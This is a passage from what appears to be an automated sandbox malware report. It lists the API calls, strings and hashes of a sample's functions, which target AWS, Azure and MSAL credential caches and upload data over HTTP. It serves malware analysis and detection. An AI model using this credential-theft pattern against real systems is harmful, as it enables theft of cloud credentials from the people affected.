                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D2087E
                                                                                    • lstrcat.KERNEL32(?,00421698), ref: 02D2088D
                                                                                    • lstrcat.KERNEL32(?,0042169C), ref: 02D2089C
                                                                                    • strtok_s.MSVCRT ref: 02D208E0
                                                                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D208F5
                                                                                    • memset.MSVCRT ref: 02D20944
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                    • String ID:
                                                                                    • API String ID: 3689735781-0
                                                                                    • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                                                    • Instruction ID: 165a19875b86c238d7f586339804d5c3030f142735ef4ec0978abcedf27838d8
                                                                                    • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                                                    • Instruction Fuzzy Hash: 9ED13B75A40228ABCB04FBF0DD95EEEB77AEF24705F504519E102A6290DF34AE09CF61
                                                                                    Function 00405960 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 493networkstringmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                                      • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                                                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                                                                    • StrCmpCA.SHLWAPI(?,02E35CA0), ref: 00405A13
                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,02E3B510,00000000,?,02E04F00,00000000,?,00421A1C), ref: 00405E71
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                                                                    • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                                                                    • memcpy.MSVCRT(?), ref: 00405EFE
                                                                                    • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                                                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                                                                    • HttpOpenRequestA.WININET(00000000,02E3B650,?,02E3AE58,00000000,00000000,00400100,00000000), ref: 00405BF8
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                    • String ID: "$"$------$------$------
                                                                                    • API String ID: 1406981993-2180234286
                                                                                    • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                                                    • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                                                                    • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                                                    • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                                                                    Function 00414D70 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 119stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 00414D87
                                                                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                                                                    • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                                                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                                                      • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                                                    • memset.MSVCRT ref: 00414E13
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                                                                    • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                                                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                                                      • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                                                      • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                                                    • memset.MSVCRT ref: 00414E9F
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                                                                    • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                                                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                                                      • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,02E35C40,?,000003E8), ref: 00414A4A
                                                                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                                                      • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                                                      • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                                                    • memset.MSVCRT ref: 00414F2B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                                                                    • API String ID: 4017274736-156832076
                                                                                    • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                                                    • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                                                                    • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                                                    • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                                                                    Function 02D1D157 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D28DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02D11660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D28DED
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02D1D1EA
                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02D1D32E
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D1D335
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D1D46F
                                                                                    • lstrcat.KERNEL32(?,00421478), ref: 02D1D47E
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D1D491
                                                                                    • lstrcat.KERNEL32(?,0042147C), ref: 02D1D4A0
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D1D4B3
                                                                                    • lstrcat.KERNEL32(?,00421480), ref: 02D1D4C2
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D1D4D5
                                                                                    • lstrcat.KERNEL32(?,00421484), ref: 02D1D4E4
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D1D4F7
                                                                                    • lstrcat.KERNEL32(?,00421488), ref: 02D1D506
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D1D519
                                                                                    • lstrcat.KERNEL32(?,0042148C), ref: 02D1D528
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D1D53B
                                                                                    • lstrcat.KERNEL32(?,00421490), ref: 02D1D54A
                                                                                      • Part of subcall function 02D2AA87: lstrlen.KERNEL32(02D1516C,?,?,02D1516C,00420DDE), ref: 02D2AA92
                                                                                      • Part of subcall function 02D2AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02D2AAEC
                                                                                    • lstrlen.KERNEL32(?), ref: 02D1D591
                                                                                    • lstrlen.KERNEL32(?), ref: 02D1D5A0
                                                                                    • memset.MSVCRT ref: 02D1D5EF
                                                                                      • Part of subcall function 02D2ACD7: StrCmpCA.SHLWAPI(0064A350,02D1AA0E,?,02D1AA0E,0064A350), ref: 02D2ACF6
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 02D1D61B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                    • String ID:
                                                                                    • API String ID: 1973479514-0
                                                                                    • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                                                    • Instruction ID: 389ccd44be6bd91a06bb19d7d04ce72b222bb1b4fcb29ee0dd943d823f9394b8
                                                                                    • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                                                    • Instruction Fuzzy Hash: 9FE13A75950128EBCB08FBE0DD95EEE737AEF24709F504159E106A62A0DE35AE08CF71
                                                                                    Function 0040CEF0 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02E04F30,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                                                                    • lstrcatA.KERNEL32(?,00000000,02E35F00,00421474,02E35F00,00421470,00000000), ref: 0040D208
                                                                                    • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                                                                    • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                                                                    • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                                                                    • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                                                                    • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                                                                    • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                                                                    • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                                                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02E342B0,?,0042110C,?,00000000), ref: 0041A82B
                                                                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                    • lstrlenA.KERNEL32(?), ref: 0040D32A
                                                                                    • lstrlenA.KERNEL32(?), ref: 0040D339
                                                                                    • memset.MSVCRT ref: 0040D388
                                                                                      • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                                                                    • String ID:
                                                                                    • API String ID: 2775534915-0
                                                                                    • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                                                    • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                                                                    • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                                                    • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                                                                    Function 02D15BC7 Relevance: 29.0, APIs: 19, Instructions: 493networkstringmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A51
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A68
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A7F
                                                                                      • Part of subcall function 02D14A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02D14AA0
                                                                                      • Part of subcall function 02D14A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02D14AB0
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02D15C5F
                                                                                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 02D15C7A
                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02D15DFA
                                                                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 02D160D8
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D160E9
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02D160FA
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D16101
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D16116
                                                                                    • memcpy.MSVCRT(?,00000000,00000000), ref: 02D1612D
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1613F
                                                                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 02D16158
                                                                                    • memcpy.MSVCRT(?), ref: 02D16165
                                                                                    • lstrlen.KERNEL32(00000000,?,?), ref: 02D16182
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 02D16196
                                                                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 02D161B3
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D16217
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D16224
                                                                                    • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02D15E5F
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D1622E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                                                                    • String ID:
                                                                                    • API String ID: 1703137719-0
                                                                                    • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                                                    • Instruction ID: 96f99395fc85c1bcad0b86bd74691735f8d2eb16473d18e2d1b2345d0f97d589
                                                                                    • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                                                    • Instruction Fuzzy Hash: 7D12BC75950238EBCB15EBA0DD94EEEB37AFF64704F504199A10662690EF706F88CF60
                                                                                    Function 02D1CBF7 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 02D1CCD3
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02D1CCF0
                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 02D1CCFC
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D1CD0F
                                                                                    • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 02D1CD1C
                                                                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02D1CD40
                                                                                    • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 02D1CD5E
                                                                                    • StrStrA.SHLWAPI(00000000,0064A364), ref: 02D1CD85
                                                                                    • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 02D1CF09
                                                                                    • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 02D1CF20
                                                                                      • Part of subcall function 02D1CA87: memset.MSVCRT ref: 02D1CABA
                                                                                      • Part of subcall function 02D1CA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 02D1CAD8
                                                                                      • Part of subcall function 02D1CA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 02D1CAE3
                                                                                      • Part of subcall function 02D1CA87: memcpy.MSVCRT(?,?,?), ref: 02D1CB79
                                                                                    • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 02D1CFC1
                                                                                    • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 02D1CFD8
                                                                                      • Part of subcall function 02D1CA87: lstrcat.KERNEL32(?,00420B46), ref: 02D1CBAA
                                                                                      • Part of subcall function 02D1CA87: lstrcat.KERNEL32(?,00420B47), ref: 02D1CBBE
                                                                                      • Part of subcall function 02D1CA87: lstrcat.KERNEL32(?,00420B4E), ref: 02D1CBDF
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1D0AB
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D1D103
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                                                    • String ID:
                                                                                    • API String ID: 3555725114-3916222277
                                                                                    • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                                                    • Instruction ID: 0d01f1e587d99b9c825b328ed44f816ccb071b7f6353643f4016deb745c86c0c
                                                                                    • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                                                    • Instruction Fuzzy Hash: 08E1ED75900228EBCB14EFA4DD94EEEB77AEF64704F004159F106A6690EF346E89CF61
                                                                                    Function 0040C990 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,02E39740,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                                                                    • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                                                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                                                                    • StrStrA.SHLWAPI(?,02E397B8,00420B52), ref: 0040CAF7
                                                                                    • StrStrA.SHLWAPI(00000000,02E39728), ref: 0040CB1E
                                                                                    • StrStrA.SHLWAPI(?,02E3A1F0,00000000,?,00421458,00000000,?,00000000,00000000,?,02E35FB0,00000000,?,00421454,00000000,?), ref: 0040CCA2
